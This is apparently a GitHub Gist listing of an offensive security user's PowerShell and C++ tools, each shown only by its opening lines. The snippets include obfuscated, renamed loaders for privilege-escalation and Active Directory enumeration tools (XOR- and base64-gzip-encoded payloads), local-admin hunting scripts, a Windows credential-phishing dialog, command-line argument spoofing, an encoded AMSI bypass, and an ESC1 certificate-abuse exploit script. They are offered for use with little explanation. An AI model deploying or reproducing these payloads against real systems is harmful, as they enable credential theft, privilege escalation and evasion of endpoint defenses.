an0nud4y An0nUD4Y
An0nUD4Y
/ Invke-SharpUpp.ps1
Created
March 28, 2025 04:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invke-SharpUpp | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "" | |
| ) |
An0nUD4Y
/ winPEES.ps1
Last active
March 28, 2025 04:50
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Key = 0x42 | |
| $EncodedString = "fmFIbBEbDA0SEQsRSGJiEi01JzARKicuLmIjJiMyNiM2Ky0sYi0kYhUrLBIHAxFsJzonYm1iFSssEicjMWwgIzZIbAYHEQEQCxIWCw0MSGJiBC0wYjYqJ2IuJyUjLmInLDcvJzAjNistLGItJGI1KywmLTUxYiAjMScmYiEtLzI3NicwMWI2KiM2YjstN2InKzYqJzBiLTUsYi0wYiMwJ2IjMjIwLTQnJmI2LWIwNyxiNiorMWIxITArMjZiLSxIbAcaAw8SDgdIYmJhYgYnJCM3LjZib2IsLTAvIy5iLTInMCM2Ky0sYjUrNipiNzEnMCwjLydtMiMxMTUtMCZiIzcmKzZiKyxiJjArNCcxbTAnJSsxNjA7SGJibB41KywSJyMxbDIxc0hIYmJhYgssIS43JidiBzohJy5iJCsuJzFiKyxiMScjMCEqeGJsOi4xbmJsOi4xOm5ibDouMS9IYmJsHjUrLBInIzFsMjFzYm8HOiEnLkhIYmJhYgQ3Li5iIzcmKzZib2IsLTAvIy5iLTInMCM2Ky0sYjUrNipiAxILMWJtYgknOzFibWIWLSknLDFIYmJhYWIWKisxYjUrLi5iMjAtJjchJ2IkIy4xJ2IyLTErNis0JzFiYWFiSGJibB41KywSJyMxbDIxc2JvBDcuLgEqJyEpYkhIYmJhYgMmJmIWKy8nYjE2Iy8yMWI2LWInIyEqYiEtLy8jLCZIYmJsHjUrLBInIzFsMjFzYm8WKy8nETYjLzJISGwMDRYHEUhiYhQnMDErLSx4YmJiYmJiYmJiYmJiYmJiYmJiYmJzbHFIYmISBwMREW8sJWINMCslKywjLmIDNzYqLTB4YmJiEgcDERFvLCVIYmI1KywSBwMRbDIxc2IDNzYqLTB4YmJiYmJiYmJiAhAjLCYtLjIqAS0sLic7SGJiATAnIzYrLSxiBiM2J3hiYmJiYmJiYmJiYmJiYnNybXZtcHJwcEhiYhUnIDErNi |
An0nUD4Y
/ PEESWIN.ps1
Last active
March 28, 2025 03:58
— forked from S3cur3Th1sSh1t/Invoke-winPEAS.ps1
winPEAS in powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invke-winPEES | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
An0nUD4Y
/ Find-WMILocalAdminAccess.ps1
Created
December 19, 2024 12:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Find-WMILocalAdminAccess | |
| { | |
| <# | |
| .SYNOPSIS | |
| Use this script tp search for local admin access on machines in a domain or local network. | |
| .DESCRIPTION | |
| This function simply runs a WMI command against the sepcified list of computers. Since, by-default, | |
| we need local administrative access on a computer to run WMI commands, a success for this fucntions | |
| means local administrative access. |
An0nUD4Y
/ Find-PSRemotingLocalAdminAccess.ps1
Last active
December 19, 2024 12:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Find-PSRemotingLocalAdminAccess { | |
| <# | |
| .SYNOPSIS | |
| Use this script to search for local admin access on machines in a domain or local network. | |
| .DESCRIPTION | |
| This function simply runs a PowerShell Remoting command against the specified list of computers. Since, by default, | |
| we need local administrative access on a computer to run WMI commands, a success for this function | |
| means local administrative access. |
An0nUD4Y
/ Invoke-SOAPHound.ps1
Created
December 3, 2024 07:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SOAPHound | |
| { | |
| $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEAOy9B1gUx//4v7d37DXacXj0ogIed4AKiigWVEDsXbFXbBEX9+wIdo1GjR019hZ778ZeoqLG2CuWaKKJMYkxJjb8z3vK3h1gPp9/8v09z+/5PV8f2Z15zXveM/PemdmZ2dm9xu1ncEqO41To78MHjtvLkX9J3H/+Nxr9uYfsd+d2as+X3qtodL50qz59baFZkthb6pYZ2qPbgAHioNDuGaHS4AGhfQeEJjdtGZop9syIcXPThVEdzVI4rpFCya20NJzG9N7nyij0igooMxqO0xB26DpyhDKJJOLmSb7hn8CCQrWYwz8l13UCx3ni//azfML/eiK9bXGiGm6VS0ml1HKu6Hj6moZL+C9sIv8LlbOO/2mQP83BHzMoY9ggdD6xh5YLysoXU9E1RrJJPZAb5w3lERd0v8ZJLgn9j5Ey+otI0JXmGes6UkyuTtFsLrtOZCBvPOfCdd0ocH0sPLIdz1VGqe29wHFr75ZomBL/+ZtHqTjBEsxnK9DFsZThlTnYgQDPAE+BkgElBSoGVBS4MOBCgcCAQIGaATUFGgY0FGgZ0FKgY0BHgZ4BPQWuDLhS4MaAGwXuDLhT4MGABwFmVEidxT/Xk3hH47N/roF6DcTrRb1exGukXnzmOGMFdD1QnpABDRI6ZOlM01AxFXrsccVHN75qM6g5ZmQhnVEwCL7tUlAUbg/6q4r+jCiwCT2HoLMLdbO/c8if4A4aTGYBVKgN6pABMT3RMSumfsJLtXNIz5hBOKRdwi0IkdCVyzIjl67afFB0EkO9DLcB3Iqhjwxxkl9gGCnDeJSxhIkYJsrwIkgOxLChDB+jNBM6YthBhnWRLRLqYdhNhuNAMhY5pWxsr+VgQl9swnCTdBn5VoT7SHfhrJd+A2MmtEGVRKqiAOl26KjzY9I2BZGehM++0m |
An0nUD4Y
/ windows_credential_phish.ps1
Created
September 23, 2024 06:46
Prompts a dialog to enter user credentials then validates them and prints on console.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # POC from greg.foss[at]owasp.org | |
| # @enigma0x3 | |
| # Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ | |
| # https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ | |
| function Invoke-Prompt { | |
| [CmdletBinding()] | |
| Param ( | |
| [Switch] $ProcCreateWait, |
An0nUD4Y
/ ArgSpoof.cpp
Last active
June 6, 2024 18:50
Interactive Command Line Argument Spoofing (WIP)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp ArgSpoof.cpp /link /OUT:ArgSpoof.exe /SUBSYSTEM:CONSOLE | |
| */ | |
| #include <iostream> | |
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <wchar.h> | |
| #include <locale.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $xor_amsi_hw_break = "HQQLHAJBOBEEFhcIWmEdBAscAkE4EQQWFwhPKAcbDhcGFQIHGRFcIgQFDQULEV5rHhseDBVFMhIbAwcfSy0CBgZMNx0RGQ0EERsKDxhTfRcBDA8MSCQbAREEBkY7CxwUWmEdBAscAkE4EQQWFwhPOR0ZFhsIBEUrGA8CDA0OGiQHABMICA0EWXgQEgIGEEIhHBIfDRpMPAAVUGICERsLBks7DhEGAAxFOhIEHgACHwEYDElvFBgBGQVSNhgYHBIPXDcUBRweDxdLKAUcEhAdFTIOGgELEQASUGJ9DBMIBBgYFgEXRTUOGwNoCW9BS0hXEgcHDQILVwEeBBIYSCcQHQITCgV9QlJFQRBiV0JSRUFLSFcRBgQVAgtXEQYXCAUPVwNSWEFJBQQLUF5rS0hXQlJFQUsbAwMGDAJLGwMQGwsGSwpXX1JHAAUqVVl4RUFLSFdCUkUSHwkDCxFFEh8aHgwVRQJLVVdAFANDUGJXQlJFQUtIVxEGBBUCC1cRBhcIBQ9XBlJYQUlGE0BJb0FLSFdCUkVBGBwWFhsGQSIGAzIGF0EpCQQHMwEFGQ0EEVJYQTwBGSMiLE8nBxYGPgwDGQkFG1pHAElIXEITRUpLDFdJUAkNSUFMaFJFQUtIV0JSFhUKHB4BUiwPHzgDEFIVICkdMUJPRTYCBjYyO0smDhwnEB0GIA8MBQcBFkkpCQQHMwEFGQ0EEV5FQypKV0lSBEFASFUxEUdBQEgVQllFQx5KV0lSBkFASFUHAEdIUGJXQlJFQUtIVxEGBBUCC1crHBExHxpXEjERGUtVVy8TFxIDCRtMMwkNBAs/JR4KAwoEXy8TFxIDCRtMIQwbDicRSgYcEQ4HEUolDA8qOD5MMSovPy0vNkRRSEJBTGhSRUFLSFdCUm9BS0hXQlJFQRsdFQ4bBkEYHBYWGwZBHQceBlIgGQ4LX0t4RUFLSFdCUkUaYWJXQlJFQUtIV0JSRUE8ARkjIixPKCc5Njc9NV1cVw |
An0nUD4Y
/ esc1.ps1
Created
October 17, 2023 16:17
— forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |